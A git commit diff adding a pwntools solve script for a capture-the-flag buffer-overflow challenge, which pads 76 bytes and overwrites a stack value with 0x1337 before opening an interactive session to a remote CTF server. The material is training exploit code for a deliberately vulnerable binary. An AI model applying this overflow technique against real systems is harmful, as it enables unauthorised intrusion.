First CTFs

2026-05-09 20:58:42 +02:00
commit 5635246581
21 changed files with 244 additions and 0 deletions
--- a/BOF/04_lemonade_stand/solve.py
+++ b/BOF/04_lemonade_stand/solve.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./lemonade_stand", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13562)
+# Your exploit here
+# mov eax, DWORD_PTR[rbp-0x4] overwrite eax value
+OFFSET = 76
+leet = 0x1337
+payload = flat(b"A" * OFFSET, p64(leet))
+p.send(payload)
+# p.send(b'cat flag\n')
+# p.recv()
+p.interactive()